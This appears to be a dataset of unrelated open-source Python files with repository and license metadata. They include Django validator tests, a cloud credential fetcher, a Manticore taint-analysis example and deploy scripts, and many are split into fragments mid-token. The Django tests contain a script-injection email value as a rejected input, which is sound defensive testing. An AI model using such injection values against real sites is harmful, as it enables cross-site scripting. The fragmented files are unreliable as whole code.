that clqsh does. Returns a dictionary containing the original values of
the monkeypatched names.
"""
cache = {'deserialize': cassandra.cqltypes.BytesType.deserialize,
'support_empty_values': cassandra.cqltypes.CassandraType.support_empty_values}
cassandra.cqltypes.BytesType.deserialize = staticmethod(lambda byts, protocol_version: bytearray(byts))
cassandra.cqltypes.CassandraType.support_empty_values = True
return cache
def unmonkeypatch_driver(cache):
"""
Given a dictionary that was used to cache parts of `cassandra` for
monkeypatching, restore those values to the `cassandra` module.
"""
cassandra.cqltypes.BytesType.deserialize = staticmethod(cache['deserialize'])
cassandra.cqltypes.CassandraType.support_empty_values = cache['support_empty_values']
|
wintoncode/winton-kafka-streams
|
winton_kafka_streams/state/logging/store_change_logger.py
|
Python
|
apache-2.0
| 503
| 0.001988
|
class StoreChangeLogger:
def __init__(self, store_name, context) -> None:
self.topic = f'{context.ap
|
plication_id}-{store_name}-changelog'
self.context = context
self.partition = context.task_id.partition
self.record_collector = context.state_record_collector
def log_change(self, key: bytes, value: bytes) -> None:
if self.record_collector:
self.record_collector.send(self.topic, key, value, self.context.timestamp, partition=self.
|
partition)
|
geobricks/geobricks_qgis_plugin_trmm
|
__init__.py
|
Python
|
gpl-2.0
| 1,510
| 0
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
GeobricksTRMM
A QGIS plugin
Download TRMM daily data.
-------------------
begin : 2015-10-06
copyright : (C) 2015 by Geobricks
email : [email protected]
git sha : $Format:%H$
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
*
|
*
***************************************************
|
************************/
This script initializes the plugin, making it known to QGIS.
"""
# noinspection PyPep8Naming
def classFactory(iface): # pylint: disable=invalid-name
"""Load GeobricksTRMM class from file GeobricksTRMM.
:param iface: A QGIS interface instance.
:type iface: QgsInterface
"""
#
from .geobricks_trmm_qgis import GeobricksTRMM
return GeobricksTRMM(iface)
|
wfxiang08/django178
|
tests/validators/tests.py
|
Python
|
bsd-3-clause
| 14,190
| 0.000918
|
# -*- coding: utf-8 -*-
from __future__ import unicode_liter
|
als
from datetime import datetime, timedelta
import re
import types
from unittest import TestCase
from django.core.exceptions import ValidationError
from django.core.val
|
idators import (
BaseValidator, EmailValidator, MaxLengthValidator, MaxValueValidator,
MinLengthValidator, MinValueValidator, RegexValidator, URLValidator,
validate_comma_separated_integer_list, validate_email, validate_integer,
validate_ipv46_address, validate_ipv4_address, validate_ipv6_address,
validate_slug,
)
from django.test.utils import str_prefix
NOW = datetime.now()
EXTENDED_SCHEMES = ['http', 'https', 'ftp', 'ftps', 'git', 'file']
TEST_DATA = (
# (validator, value, expected),
(validate_integer, '42', None),
(validate_integer, '-42', None),
(validate_integer, -42, None),
(validate_integer, -42.5, None),
(validate_integer, None, ValidationError),
(validate_integer, 'a', ValidationError),
(validate_email, '[email protected]', None),
(validate_email, '[email protected]', None),
(validate_email, 'email@[127.0.0.1]', None),
(validate_email, 'email@[2001:dB8::1]', None),
(validate_email, 'email@[2001:dB8:0:0:0:0:0:1]', None),
(validate_email, 'email@[::fffF:127.0.0.1]', None),
(validate_email, '[email protected]', None),
(validate_email, '[email protected]', None),
(validate_email, '[email protected].उदाहरण.परीक्षा', None),
(validate_email, 'email@localhost', None),
(EmailValidator(whitelist=['localdomain']), 'email@localdomain', None),
(validate_email, '"test@test"@example.com', None),
(validate_email, None, ValidationError),
(validate_email, '', ValidationError),
(validate_email, 'abc', ValidationError),
(validate_email, 'abc@', ValidationError),
(validate_email, 'abc@bar', ValidationError),
(validate_email, 'a @x.cz', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, 'something@@somewhere.com', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, 'email@[127.0.0.256]', ValidationError),
(validate_email, 'email@[2001:db8::12345]', ValidationError),
(validate_email, 'email@[2001:db8:0:0:0:0:1]', ValidationError),
(validate_email, 'email@[::ffff:127.0.0.256]', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, '[email protected]', ValidationError),
(validate_email, '[email protected]\n\n<script src="x.js">', ValidationError),
# Quoted-string format (CR not allowed)
(validate_email, '"\\\011"@here.com', None),
(validate_email, '"\\\012"@here.com', ValidationError),
(validate_email, '[email protected].', ValidationError),
(validate_slug, 'slug-ok', None),
(validate_slug, 'longer-slug-still-ok', None),
(validate_slug, '--------', None),
(validate_slug, 'nohyphensoranything', None),
(validate_slug, '', ValidationError),
(validate_slug, ' text ', ValidationError),
(validate_slug, ' ', ValidationError),
(validate_slug, '[email protected]', ValidationError),
(validate_slug, '你好', ValidationError),
(validate_slug, '\n', ValidationError),
(validate_ipv4_address, '1.1.1.1', None),
(validate_ipv4_address, '255.0.0.0', None),
(validate_ipv4_address, '0.0.0.0', None),
(validate_ipv4_address, '256.1.1.1', ValidationError),
(validate_ipv4_address, '25.1.1.', ValidationError),
(validate_ipv4_address, '25,1,1,1', ValidationError),
(validate_ipv4_address, '25.1 .1.1', ValidationError),
# validate_ipv6_address uses django.utils.ipv6, which
# is tested in much greater detail in its own testcase
(validate_ipv6_address, 'fe80::1', None),
(validate_ipv6_address, '::1', None),
(validate_ipv6_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv6_address, '1:2', ValidationError),
(validate_ipv6_address, '::zzz', ValidationError),
(validate_ipv6_address, '12345::', ValidationError),
(validate_ipv46_address, '1.1.1.1', None),
(validate_ipv46_address, '255.0.0.0', None),
(validate_ipv46_address, '0.0.0.0', None),
(validate_ipv46_address, 'fe80::1', None),
(validate_ipv46_address, '::1', None),
(validate_ipv46_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv46_address, '256.1.1.1', ValidationError),
(validate_ipv46_address, '25.1.1.', ValidationError),
(validate_ipv46_address, '25,1,1,1', ValidationError),
(validate_ipv46_address, '25.1 .1.1', ValidationError),
(validate_ipv46_address, '1:2', ValidationError),
(validate_ipv46_address, '::zzz', ValidationError),
(validate_ipv46_address, '12345::', ValidationError),
(validate_comma_separated_integer_list, '1', None),
(validate_comma_separated_integer_list, '1,2,3', None),
(validate_comma_separated_integer_list, '1,2,3,', None),
(validate_comma_separated_integer_list, '', ValidationError),
(validate_comma_separated_integer_list, 'a,b,c', ValidationError),
(validate_comma_separated_integer_list, '1, 2, 3', ValidationError),
(MaxValueValidator(10), 10, None),
(MaxValueValidator(10), -10, None),
(MaxValueValidator(10), 0, None),
(MaxValueValidator(NOW), NOW, None),
(MaxValueValidator(NOW), NOW - timedelta(days=1), None),
(MaxValueValidator(0), 1, ValidationError),
(MaxValueValidator(NOW), NOW + timedelta(days=1), ValidationError),
(MinValueValidator(-10), -10, None),
(MinValueValidator(-10), 10, None),
(MinValueValidator(-10), 0, None),
(MinValueValidator(NOW), NOW, None),
(MinValueValidator(NOW), NOW + timedelta(days=1), None),
(MinValueValidator(0), -1, ValidationError),
(MinValueValidator(NOW), NOW - timedelta(days=1), ValidationError),
(MaxLengthValidator(10), '', None),
(MaxLengthValidator(10), 10 * 'x', None),
(MaxLengthValidator(10), 15 * 'x', ValidationError),
(MinLengthValidator(10), 15 * 'x', None),
(MinLengthValidator(10), 10 * 'x', None),
(MinLengthValidator(10), '', ValidationError),
(URLValidator(), 'http://www.djangoproject.com/', None),
(URLValidator(), 'HTTP://WWW.DJANGOPROJECT.COM/', None),
(URLValidator(), 'http://localhost/', None),
(URLValidator(), 'http://example.com/', None),
(URLValidator(), 'http://www.example.com/', None),
(URLValidator(), 'http://www.example.com:8000/test', None),
(URLValidator(), 'http://valid-with-hyphens.com/', None),
(URLValidator(), 'http://subdomain.example.com/', None),
(URLValidator(), 'http://200.8.9.10/', None),
(URLValidator(), 'http://200.8.9.10:8000/test', None),
(URLValidator(), 'http://valid-----hyphens.com/', None),
(URLValidator(), 'http://example.com?something=value', None),
(URLValidator(), 'http://example.com/index.php?something=value&another=value2', None),
(URLValidator(), 'https://example.com/', None),
(URLValidator(), 'ftp://example.com/', None),
(URLValidator(), 'ftps://example.com/', None),
(URLValidator(EXTENDED_SCHEMES), 'file://localhost/path', None),
(URLValidator(EXTENDED_SCHEMES), 'git://example.com/', None),
(URLValidator(), 'foo', ValidationError),
(URLValidator(), 'http://', ValidationError),
(URLValidator(), 'http://example', ValidationError),
(URLValidator(), 'http://example.', ValidationError),
(URLValidator(), 'http://.com', ValidationError),
(URLValidator(), 'http://invalid-.com', ValidationError),
(URLValidator(), 'http://-invalid.com', ValidationError),
(URLValidator(), 'http://invalid.com-', ValidationError),
(URLValidator(), 'http://inv-.alid-.com', ValidationError),
(URLValidator(), 'http://inv-.-alid.com', ValidationError),
(URLValidator(), 'file://localhost/path', ValidationError),
(URLValidator(), 'git://example.com/', ValidationError),
(URLValidator(EXTENDED_SCHEMES), 'git:/
|
TwilioDevEd/api-snippets
|
notifications/register/send-notification/send-notification.7.x.py
|
Python
|
mit
| 528
| 0
|
#!/usr/bin/env python
# Install
|
the Python helper library from twilio.com/docs/python/install
import os
from twilio.rest import Client
# To set up environmental variables, see http://twil.io/secure
ACCOUNT_SID = os.environ['TWILIO_ACCOUNT_SID']
AUTH_TOKEN = os.environ['TWILIO_AUTH_TOKEN']
client = Client(ACCOUNT_SID, AUTH_TOKEN)
notification = client.notify.services('ISXXXXXXXXXXXXXX
|
XXXXXXXXXXXXXXXXXX') \
.notifications.create(identity='00000001',
body='Hello Bob')
print(notification.sid)
|
sjperkins/tensorflow
|
tensorflow/tensorboard/backend/event_processing/plugin_asset_util.py
|
Python
|
apache-2.0
| 3,278
| 0.006406
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Load plugin assets from disk."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import tensorflow as tf
_PLUGINS_DIR = "plugins"
def _IsDirectory(parent, item):
"""Helper that returns if parent/item is a directory."""
return tf.gfile.IsDirectory(os.path.join(parent, item))
def PluginDirectory(logdir, plugin_name):
"""Returns the plugin directory for plugin_name."""
return os.path.join(logdir, _PLUGINS_DIR, plugin_name)
def ListPlugins(logdir):
"""List all the plugins that have registered assets in logdir.
If the plugins_dir does not exist, it returns an empty list. This maintains
compatibility with old directories that have no plugins written.
Args:
logdir: A directory that was created by a TensorFlow events writer.
Returns:
a list of plugin names, as strings
"""
plugins_dir = os.path.join(logdir, _PLUGINS_DIR)
if not tf.gfile.IsDirectory(plugins_dir):
return []
entries = tf.gfile.ListDirectory(plugins_dir)
return [x for x in entries if _IsDirectory(plugins_dir, x)]
def ListAssets(logdir, plugin_name):
"""List all the assets that are available for given plugin in a logdir.
Args:
logdir: A directory that was created by a TensorFlow summary.FileWriter.
plugin_name: A string name of a plugin to list assets for.
Returns:
A string list of available plugin assets. If the plugin subdirectory does
not exist (either because the logdir doesn't exist, or because the plugin
didn't register) an empty list is returned.
"""
plugin_dir = PluginDirectory(logdir, plugin_name)
if not tf.gfile.IsDirectory(plugin_dir):
return []
entries = tf.gfile.ListDirectory(plugin_dir)
return [x for x in entries if not _IsDirectory(plugin_dir, x)]
def RetrieveAsset(logdir, plugin_name, asset_name):
"""Retrieve a particular plugin asset from a logdir.
Args:
logdir: A directory that was created by a TensorFl
|
ow summary.FileWriter.
plugin_name: The plugin we want an asset from.
asset_name: The name of the requested asset.
Returns:
string contents of the plugin asset.
Raises:
KeyError: if the asset does not exist.
"""
asset_path = os.path.join(PluginDirectory(logdir, plugin_name), asset_name)
try:
with
|
tf.gfile.Open(asset_path, "r") as f:
return f.read()
except tf.errors.NotFoundError:
raise KeyError("Asset path %s not found" % asset_path)
except tf.errors.OpError as e:
raise KeyError("Couldn't read asset path: %s, OpError %s" % (asset_path, e))
|
yuuagh/pywork
|
20171127/go.py
|
Python
|
gpl-3.0
| 4,158
| 0.015506
|
# -*- coding:utf-8 -*-
# @author yuding
# 2017-09-23
import re
import os
import shutil
import msvcrt
import traceback
def mkdir(path):
# 去除首位空格
path = path.strip()
# 去除尾部 \ 符号
path = path.rstrip("\\")
isExists = os.path.exists(path)
if not isExists:
os.makedirs(path)
# 获得目标字符串
def getTargetData(fname):
# 先得到大致内容
nc = open(fname + '.gb')
str = nc.read()
nc.close()
# 去除干扰信息
str = re.sub(r'\.\.>', '..', str)
# 取CDS到protein_id="xxxx"之间内容
pattern = r'CDS.*?protein_id=".*?".*?gene=".*?"'
p = re.compile(pattern, re.S|re.I)
result = p.findall(str)
# 得到目标字符串 得到 "xxx..xxx protein_id里面内容"
newpattern = r'([\d]+?\.\.[\d]+,[\d]+?\.\.[\d]+,?[\d]+?\.\.[\d]+|[\d]+?\.\.[\d]+,?[\d]+?\.\.[\d]+|[\d]+?\.\.[\d]+).*protein_id="(.+?)".*gene="(.+?)"'
p2 = re
|
.compile(newpattern, re.S|re.I)
# 数据存入字典中
dic = {}
geneDic = {}
|
for unit in result:
result2 = p2.findall(unit)
value = re.split(',', result2[0][0])
key = result2[0][1]
dic[key] = value
geneDic[key] = result2[0][2]
return (dic, geneDic)
# 获得替换的内容
def getContent(fname):
tf = open(fname + '.fasta')
first = tf.readline() #读取第一行,这一行不要
content = tf.read() #从第二行开始
# 删除头部和换行符
content = re.sub(r'\n', '', content)
tf.close()
return content
def getAllData2(dirname, fname, name):
(dic, geneDic) = getTargetData(fname)
content = getContent(fname)
fl = open(dirname + '\\' + name + '.txt', 'wb')
length = len(content)
for unit in dic:
pt = ''
for k in dic[unit]:
pt = pt + k + ','
lh = len(pt)
if lh > 0:
pt = pt[0:lh - 1]
fl.write('name = ' + name + ', protein_id = ' + unit + ', ' + 'gene = ' + geneDic[unit] + ', position = ' + pt + ":\n")
for k in dic[unit]:
# 字符串 content 是从0的下标开始
value = re.split(r'\.\.', k)
bg = int(value[0]) - 1
ed = int(value[1]) - 1
if bg > length - 1:
bg = length - 1
print 'begin beyond the max length'
if ed > length - 1:
print 'end beyond the max length' + ', length = ' + str(length) + ', ed = ' + str(ed)
ed = length - 1
final = content[bg : ed]
fl.write(final)
fl.write("\n")
fl.close()
def getPath():
# 从当前文件路径中获取目录
dname = os.path.dirname(os.path.realpath(__file__))
dname = dname + '\\source'
filelist = os.listdir(dname)
names = []
for filename in filelist:
rl = re.split(r'\.', filename)
names.append(rl[0])
names = list(set(names))
return names
def getPackageData():
curfile = os.path.dirname(os.path.realpath(__file__))
names = getPath()
# make dir
mkdir(curfile + '\\result')
shutil.rmtree(curfile + '\\result')
mkdir(curfile + '\\result')
log = open(curfile + '\\log.txt', 'wb')
log.write('result path: ' + curfile + '\\result' + '\n')
for name in names:
try:
getAllData2(curfile + '\\result', curfile + '\\source\\' + name, name)
print('analysis id = ' + name + ',success')
log.write('analysis id = ' + name + ',success' + '\n')
except Exception, e:
print('analysis id = ' + name + ',fail')
log.write('analysis id = ' + name + ',fail')
log.write('message: ' + e.message)
log.close()
print('analysis finish')
print("Press 'd' to exit...")
while True:
if ord(msvcrt.getch()) in [68, 100]:
break
def main():
getPackageData()
if __name__ == '__main__':
main()
|
marios-zindilis/musicbrainz-django-models
|
musicbrainz_django_models/models/area_attribute.py
|
Python
|
gpl-2.0
| 1,946
| 0.004111
|
"""
.. module:: area_attribute
The **Area Attribute** Model.
PostgreSQL Definition
---------------------
The :code:`area_attribute` table is defined in the MusicBrainz Server as:
.. code-block:: sql
CREATE TABLE area_attribute ( -- replicate
|
(verbose)
id SERIAL, -- PK
area INTEGER NOT NULL, -- references area.id
area_attribute_type INTEGER NOT
|
NULL, -- references area_attribute_type.id
area_attribute_type_allowed_value INTEGER, -- references area_attribute_type_allowed_value.id
area_attribute_text TEXT
CHECK (
(area_attribute_type_allowed_value IS NULL AND area_attribute_text IS NOT NULL)
OR
(area_attribute_type_allowed_value IS NOT NULL AND area_attribute_text IS NULL)
)
);
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from ..signals import pre_save_model_attribute
@python_2_unicode_compatible
class area_attribute(models.Model):
"""
Not all parameters are listed here, only those that present some interest
in their Django implementation.
:param area: References :class:`area`
:param area_attribute_type: References :class:`area_attribute_type`
:param area_attribute_type_allowed_value: References :class:`area_attribute_type_allowed_value`.
"""
id = models.AutoField(primary_key=True)
area = models.ForeignKey('area')
area_attribute_type = models.ForeignKey('area_attribute_type')
area_attribute_type_allowed_value = models.ForeignKey('area_attribute_type_allowed_value', null=True)
area_attribute_text = models.TextField(null=True)
def __str__(self):
return 'Area Attribute'
class Meta:
db_table = 'area_attribute'
models.signals.pre_save.connect(pre_save_model_attribute, sender=area_attribute)
|
aliyun/aliyun-oss-python-sdk
|
oss2/credentials.py
|
Python
|
mit
| 4,941
| 0.003036
|
# -*- coding: utf-8 -*-
import time
import requests
import json
import logging
import threading
from .exceptions import ClientError
from .utils import to_unixtime
from .compat import to_unicode
logger = logging.getLogger(__name__)
class Credentials(object):
def __init__(self, access_key_id="", access_key_secret="", security_token=""):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
self.security_token = security_token
def get_access_key_id(self):
return self.access_key_id
def get_access_key_secret(self):
return self.access_key_secret
def get_security_token(self):
return self.security_token
DEFAULT_ECS_SESSION_TOKEN_DURATION_SECONDS = 3600 * 6
DEFAULT_ECS_SESSION_EXPIRED_FACTOR = 0.85
class EcsRamRoleCredential(Credentials):
def __init__(self,
access_key_id,
access_key_secret,
security_token,
expiration,
duration,
expired_factor=None):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
self.security_token = security_token
self.expiration = expiration
self.duration = duration
self.expired_factor = expired_factor or DEFAULT_ECS_SESSION_EXPIRED_FACTOR
def get_access_key_id(self):
return self.access_key_id
def get_access_key_secret(self):
return self.access_key_secret
def get_security_token(self):
return self.security_token
def will_soon_expire(self):
now = int(time.time())
return self.duration * (1.0 - self.expired_factor) > self.expiration - now
class CredentialsProvider(object):
def get_credentials(self):
return
class StaticCredentialsProvider(CredentialsProvider):
def __init__(self, access_key_id="", access_key_secret="", security_token=""):
self.credentials = Credentials(access_key_id, access_key_secret, security_token)
def get_credentials(self):
return self.credentials
class EcsRamRoleCredentialsProvider(CredentialsProvider):
def __init__(self, auth_host, max_retries=3, timeout=10):
self.fetcher = EcsRamRoleCredentialsFetcher(auth_host)
self.max_retries = max_retries
self.timeout = timeout
self.credentials = None
self.__lock = threading.Lock()
def get_credentials(self):
if self.credentials is None or self.credentials.will_soon_expire():
with self.__lock:
if self.credentials is None or self.credentials.will_soon_expire():
try:
self.credentials = self.fetcher.fetch(self.max_retries, self.timeout)
except Exception as e:
logger.error("Exception: {0}".format(e))
if self.credentials is None:
raise
|
return self.credentials
class EcsRamRoleCredentialsFetcher(object):
def __init__(self, auth_host):
self.auth_host = auth_host
def fetch(self, retry_times=3, timeout=10):
for i in range(0, retry_times):
try:
response = requests.get(self.auth_host, timeout=timeout)
if response.status_code != 200:
raise ClientError(
"Failed to fetch credentials url, http code:{0}, msg:{1}".form
|
at(response.status_code,
response.text))
dic = json.loads(to_unicode(response.content))
code = dic.get('Code')
access_key_id = dic.get('AccessKeyId')
access_key_secret = dic.get('AccessKeySecret')
security_token = dic.get('SecurityToken')
expiration_date = dic.get('Expiration')
last_updated_date = dic.get('LastUpdated')
if code != "Success":
raise ClientError("Get credentials from ECS metadata service error, code: {0}".format(code))
expiration_stamp = to_unixtime(expiration_date, "%Y-%m-%dT%H:%M:%SZ")
duration = DEFAULT_ECS_SESSION_TOKEN_DURATION_SECONDS
if last_updated_date is not None:
last_updated_stamp = to_unixtime(last_updated_date, "%Y-%m-%dT%H:%M:%SZ")
duration = expiration_stamp - last_updated_stamp
return EcsRamRoleCredential(access_key_id, access_key_secret, security_token, expiration_stamp,
duration, DEFAULT_ECS_SESSION_EXPIRED_FACTOR)
except Exception as e:
if i == retry_times - 1:
logger.error("Exception: {0}".format(e))
raise ClientError("Failed to get credentials from ECS metadata service. {0}".format(e))
|
bl8/bockbuild
|
packages/clutter.py
|
Python
|
mit
| 136
| 0.058824
|
GnuXzPackage ('clutter', '1.10.6',
sources = [ 'http://source.cl
|
utter-project.org/sources/clutter/1.10/%
|
{name}-%{version}.tar.xz' ],
)
|
montyly/manticore
|
examples/script/introduce_symbolic_bytes.py
|
Python
|
apache-2.0
| 2,875
| 0.001043
|
#!/usr/bin/env python
import sys
from manticore import issymbolic
from manticore.native import Manticore
"""
Replaces a variable that controls program flow with a tainted symbolic value. This
in turn explores all possible states under that variable's influence, and reports the
specific cmp/test instructions can be influenced by tainted data.
Usage:
$ gcc -static -g src/state_explore.c -o state_explore # -static is optional
$ ADDRESS=0x$(objdump -S state_explore | grep -A 1 '((value & 0xff) != 0)' |
tail -n 1 | sed 's|^\s*||g' | cut -f1 -d:)
$ python ./introduce_symbolic_bytes.py state_explore $ADDRESS
Tainted Control Flow:
introducing symbolic value to 7ffffffffd44
400a0e: test eax, eax
400a19: cmp eax, 0x3f
400b17: test eax, eax
400b1e: cmp eax, 0x1000
400b63: test eax, eax
400a3e: cmp eax, 0x41
400a64: cmp eax, 0x42
400a8a: cmp eax, 0x43
400ab0: cmp eax, 0x44
400b6a: cmp eax, 0xf0000
Analysis finished. See ./mcore_cz3Jzp for results.
"""
if __name__ == "__main__":
if len(sys.argv) < 3:
sys.stderr.write(f"Usage: {sys.argv[0]} [binary] [address]\n")
sys.exit(2)
# Passing a parameter to state_explore binary disables reading the value
# from STDIN, and relies on us adding it manually
m = Manticore(sys.argv[1], ["anything"])
# Uncomment to see debug output
# m.verbosity = 2
# Set to the address of the instruction before the first conditional.
introduce_at = int(sys.argv[2], 0)
taint_id = "taint_A"
@m.hook(introduce_at)
def introduce_sym(state):
# RBP-0xC is the location of the value we're interested in:
#
# if ((value & 0xff) != 0) {
# 400a08: 8b 45 f4 mov -0xc(%rbp),%eax
# 400a0b: 0f b6 c0 movzbl %al,%eax
# 400a0e:
|
85 c0 test %eax,%eax
#
|
print(f"introducing symbolic value to {state.cpu.RBP-0xc:x}")
val = state.new_symbolic_value(32, taint=(taint_id,))
state.cpu.write_int(state.cpu.RBP - 0xC, val, 32)
def has_tainted_operands(operands, taint_id):
# type: (list[manticore.core.cpu.abstractcpu.Operand], object) -> bool
for operand in operands:
op = operand.read()
if issymbolic(op) and taint_id in op.taint:
return True
return False
every_instruction = None
@m.hook(every_instruction)
def check_taint(state):
insn = state.cpu.instruction # type: capstone.CsInsn
if insn is None:
return
if insn.mnemonic in ("cmp", "test"):
if has_tainted_operands(insn.operands, taint_id):
print(f"{insn.address:x}: {insn.mnemonic} {insn.op_str}")
print("Tainted Control Flow:")
m.run()
print(f"Analysis finished. See {m.workspace} for results.")
|
jorgenschaefer/healthmonitor
|
fabfile.py
|
Python
|
agpl-3.0
| 1,805
| 0
|
# Fabric file for the health monitor.
#
# This should only be used for deployment tasks. make should be
# sufficient for development.
import os
from fabric.api import env, task, roles, lcd, local, run, put
BASE_DIR = os.path.dirname(__file__)
env.path = ":".join([
'/home
|
/forcer/bin/',
os.path.join(BASE_DIR, "node_modules/.bin/")
])
env.roledefs = {
'production': ['healthmonitor@loki']
}
@task
@roles('production')
def deploy():
run("test -d venv || pyvenv-3.4 venv")
run("test -f venv/lib/python3.4/site-packages/_healthmonitor.pth || "
"echo $HOME/lib > venv/l
|
ib/python3.4/site-packages/_healthmonitor.pth")
run("mkdir -p health.jorgenschaefer.de/static/")
run("mkdir -p lib/")
local("git archive -o deploy.tar.gz HEAD")
put("deploy.tar.gz")
local("rm deploy.tar.gz")
run("tar -C lib/ -xzf deploy.tar.gz")
run("rm deploy.tar.gz")
local("bower install --production")
local("tar -c bower_components/ "
"-zf bower_components.tar.gz")
put("bower_components.tar.gz")
local("rm bower_components.tar.gz")
run("tar -C lib -xzf bower_components.tar.gz")
run("rm bower_components.tar.gz")
local("make compress")
local("tar -C static -c CACHE -zf compressed_cache.tar.gz")
put("compressed_cache.tar.gz")
local("rm compressed_cache.tar.gz")
run("tar -C health.jorgenschaefer.de/static/ -xzf compressed_cache.tar.gz")
run("rm compressed_cache.tar.gz")
run("venv/bin/pip install -qr lib/requirements.txt")
run("venv/bin/django-admin migrate --noinput "
"--settings=healthmonitor.settings_production")
run("venv/bin/django-admin collectstatic --noinput "
"--settings=healthmonitor.settings_production")
run("sudo /usr/bin/supervisorctl restart healthmonitor")
|
fabian-paul/PyEMMA
|
pyemma/coordinates/clustering/regspace.py
|
Python
|
lgpl-3.0
| 6,283
| 0.002547
|
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on 26.01.2015
@author: marscher
'''
import warnings
from pyemma.coordinates.clustering.interface import AbstractClustering
from pyemma.util.annotators import fix_docs
from pyemma.util.exceptions import NotConvergedWarning
import numpy as np
__all__ = ['RegularSpaceClustering']
@fix_docs
class RegularSpaceClustering(AbstractClustering):
r"""Regular space clustering"""
__serialize_version = 0
def __init__(self, dmin, max_centers=1000, metric='euclidean', stride=1, n_jobs=None, skip=0):
"""Clusters data objects in such a way, that cluster centers are at least in
distance of dmin to each other according to the given metric.
The assignment of data objects to cluster centers is performed by
Voronoi partioning.
Regular space clustering [Prinz_2011]_ is very similar to Hartigan's leader
algorithm [Hartigan_1975]_. It consists of two passes through
the data. Initially, the first data point is added to the list of centers.
For every subsequent data point, if it has a greater distance than dmin from
every center, it also becomes a center. In the second pass, a Voronoi
discretization with the computed centers is used to partition the data.
Parameters
----------
dmin : float
minimum distance between all clusters.
metric : str
metric to use during clustering ('euclidean', 'minRMSD')
max_centers : int
if this cutoff is hit during finding the centers,
the algorithm will abort.
n_jobs : int or None, default None
Number of threads to use during assignment of the data.
If None, all available CPUs will be used.
References
----------
.. [Prinz_2011] Prinz J-H, Wu H, Sarich M, Keller B, Senne M, Held M, Chodera JD, Schuette Ch and Noe F. 2011.
Markov models of molecular kinetics: Generation and Validation.
J. Chem. Phys. 134, 174105.
.. [Hartigan_1975] Hartigan J. Clustering algorithms.
New York: Wiley; 1975.
"""
super(RegularSpaceClustering, self).__init__(metric=metric, n_jobs=n_jobs)
self._converged = False
self.set_params(dmin=dmin, metric=metric,
max_centers=max_centers, stride=stride, skip=skip)
def describe(self):
return "[RegularSpaceClustering dmin=%f, inp_dim=%i]" % (self._dmin, self.data_producer.dimension())
@property
def dmin(self):
"""Minimum distance between cluster centers."""
return self._dmin
@dmin.setter
def dmin(self, d):
d = float(d)
if d < 0:
raise ValueError("d has to be positive")
self._dmin = d
@property
def max_centers(self):
"""
Cutoff during clustering. If reached no more data is taken into account.
You might then consider a larger value or a larger dmin value.
"""
return self._max_centers
@max_centers.setter
def max_centers(self, value):
value = int(value)
if value < 0:
raise ValueError("max_centers has to be positive")
self._max_centers = value
@property
def n_clusters(self):
return self.max_centers
@n_clusters.setter
def n_clusters(self, val):
self.max_centers = val
def _estimate(self, iterable, **kwargs):
########
# Calculate clustercenters:
# 1. choose first datapoint as centroid
# 2. for all X: calc distances to all clustercenters
# 3. add new centroid, if min(distance to all other clustercenters) >= dmin
########
# temporary list to store cluster centers
clustercenters = []
used_frames = 0
from ._ext import regspace
self._inst = regspace.Regspace_f(self.dmin, self.max_centers, self.metric, iterable.ndim)
it = iterable.iterator(return_trajindex=False, stride=self.stride,
chunk=self.chunksize, skip=self.skip)
try:
with it:
for X in it:
used_frames += len(X)
self._inst.cluster(X.astype(np.float32, order='C', copy=False)
|
,
clustercenters, self.n_jobs)
self._converged = True
except regspace
|
.MaxCentersReachedException:
self._converged = False
msg = 'Maximum number of cluster centers reached.' \
' Consider increasing max_centers or choose' \
' a larger minimum distance, dmin.'
self.logger.warning(msg)
warnings.warn(msg)
# pass amount of processed data
used_data = used_frames / float(it.n_frames_total()) * 100.0
raise NotConvergedWarning("Used data for centers: %.2f%%" % used_data)
finally:
# even if not converged, we store the found centers.
new_shape = (len(clustercenters), iterable.ndim)
clustercenters = np.array(clustercenters).reshape(new_shape)
self.update_model_params(clustercenters=clustercenters,
n_clusters=len(clustercenters))
if len(clustercenters) == 1:
self.logger.warning('Have found only one center according to '
'minimum distance requirement of %f' % self.dmin)
return self
|
matzika/article-tagger-system
|
words_similarity_detector.py
|
Python
|
gpl-2.0
| 3,189
| 0.007839
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 12 11:57:45 2016
@author: katerinailiakopoulou
"""
import gensim
import logging
import sys
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
"""
The Finder finds which words are similar to the one given
based on the word2vec word vectors. It also prints how similar two
words are depending on their word vectors comparison.
"""
class Finder(object):
def __init__(self,model,output,topn):
self.output_file = open(output,'w')
self.m = gensim.models.Word2Vec.load(model)
print(len(self.m.index2word))
self.n = topn
def get_most_similar(self,input):
self.output_file.write('---Similar words to:' + input + '---\n')
try:
self.output_file.write(str(self.m.most_similar([input], topn=self.n)))
